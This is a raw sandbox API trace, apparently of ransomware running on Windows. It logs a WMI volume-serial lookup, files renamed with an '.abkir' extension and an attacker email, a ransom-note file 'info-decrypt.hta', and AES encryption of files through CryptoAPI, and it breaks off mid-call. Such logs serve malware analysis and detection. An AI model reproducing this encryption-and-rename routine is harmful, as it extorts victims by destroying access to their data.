dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6027720) returned 0x0 [0192.828] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027720, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x60332c4) returned 0x0 [0193.669] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5ac84) returned 0x0 [0193.669] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ac84, pProxy=0x60332c4, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0193.669] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x1 [0193.669] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5aca4) returned 0x0 [0193.669] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5ac84) returned 0x0 [0193.669] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ac84, pProxy=0x60332c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0193.670] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x2 [0193.671] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0193.671] CoTaskMemFree (pv=0xbd4a38) [0193.671] WbemLocator:IUnknown:Release (This=0x6027720) returned 0x0 [0193.671] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5aca4) returned 0x0 [0193.671] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0193.692] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0193.693] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0193.693] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0193.701] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0193.701] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5ac04) returned 0x0 [0193.701] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ac04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.701] WbemLocator:IUnknown:Release (This=0xb5ac04) returned 0x3 [0193.701] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0193.701] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0193.701] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5ac8c) returned 0x0 [0193.702] WbemLocator:IRpcOptions:Query (in: This=0xb5ac8c, pPrx=0xb5aca4, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0193.702] WbemLocator:IUnknown:Release (This=0xb5ac8c) returned 0x3 [0193.702] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0193.702] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0193.702] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0193.702] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x60332c4) returned 0x0 [0193.702] WbemLocator:IUnknown:AddRef (This=0x60332c4) returned 0x4 [0193.702] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x3 [0193.702] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x2 [0193.702] SysStringLen (param_1=0x0) returned 0x0 [0193.702] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0193.702] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0193.702] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.702] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0193.702] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0193.702] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5aca4) returned 0x0 [0193.703] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x3 [0193.703] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0193.703] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0193.703] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.703] IWbemServices:GetObject (in: This=0x60332c4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028648, ppCallResult=0x0) returned 0x0 [0193.961] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0193.961] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0193.961] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.962] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3782f08*=0, plFlavor=0x3782f0c*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3782f08*=8, plFlavor=0x3782f0c*=0) returned 0x0 [0193.962] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.962] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.962] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3782f08*=8, plFlavor=0x3782f0c*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3782f08*=8, plFlavor=0x3782f0c*=0) returned 0x0 [0193.962] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.962] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.962] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0193.962] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6b [0193.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0193.962] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2cab9e00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0193.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0193.962] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0193.964] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0193.964] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0193.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0193.964] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b18b740, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1b18b740, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1b18b740, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0193.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0193.964] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0193.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0193.964] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x378357c | out: lpFileInformation=0x378357c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e)) returned 1 [0193.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0193.964] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0193.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0193.965] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0193.965] GetFileType (hFile=0x45c) returned 0x1 [0193.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0193.965] GetFileType (hFile=0x45c) returned 0x1 [0193.965] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x75e [0193.965] ReadFile (in: hFile=0x45c, lpBuffer=0x3880ffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x3880ffc*, lpNumberOfBytesRead=0x6c0f4ec*=0x75e, lpOverlapped=0x0) returned 1 [0193.985] CloseHandle (hObject=0x45c) returned 1 [0193.985] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0x66bb510) returned 1 [0193.986] CryptGenRandom (in: hProv=0x66bb510, dwLen=0x10, pbBuffer=0x3882350 | out: pbBuffer=0x3882350) returned 1 [0194.736] CryptImportKey (in: hProv=0x66bb510, pbData=0x3857954, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f610) returned 1 [0194.736] CryptContextAddRef (hProv=0x66bb510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.736] CryptContextAddRef (hProv=0x66bb510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.736] CryptDuplicateKey (in: hKey=0xb7f610, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f110) returned 1 [0194.736] CryptContextAddRef (hProv=0x66bb510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.736] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x4, pbData=0x3857a34*=0x1, dwFlags=0x0) returned 1 [0194.737] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x1, pbData=0x3857a00, dwFlags=0x0) returned 1 [0194.737] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3857a44*, pdwDataLen=0x6c0f4b8*=0x760, dwBufLen=0x760 | out: pbData=0x3857a44*, pdwDataLen=0x6c0f4b8*=0x760) returned 1 [0194.737] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38581c8*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x38581c8*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0194.739] CryptDestroyKey (hKey=0xb7f610) returned 1 [0194.739] CryptReleaseContext (hProv=0x66bb510, dwFlags=0x0) returned 1 [0194.739] CryptReleaseContext (hProv=0x66bb510, dwFlags=0x0) returned 1 [0194.739] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0194.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0194.739] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0194.776] GetFileType (hFile=0x4a8) returned 0x1 [0194.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0194.776] GetFileType (hFile=0x4a8) returned 0x1 [0194.776] WriteFile (in: hFile=0x4a8, lpBuffer=0x38587ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x38587ec*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0194.777] CloseHandle (hObject=0x4a8) returned 1 [0194.778] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0194.778] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0194.778] CoTaskMemFree (pv=0xbed438) [0194.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0194.778] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0194.778] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0194.779] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0194.779] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.780] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6027620) returned 0x0 [0194.780] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027620, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0194.780] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027620, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6030a20) returned 0x0 [0194.780] WbemDefPath:IUnknown:Release (This=0x6027620) returned 0x0 [0194.780] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6030a20) returned 0x0 [0194.780] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0194.780] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0194.780] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0194.780] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0194.780] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0x66ccc08) returned 0x0 [0194.780] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.781] WbemDefPath:IUnknown:Release (This=0x66ccc08) returned 0x3 [0194.781] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0194.781] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0194.781] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0194.781] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0194.781] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0194.781] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0194.781] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0194.781] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, 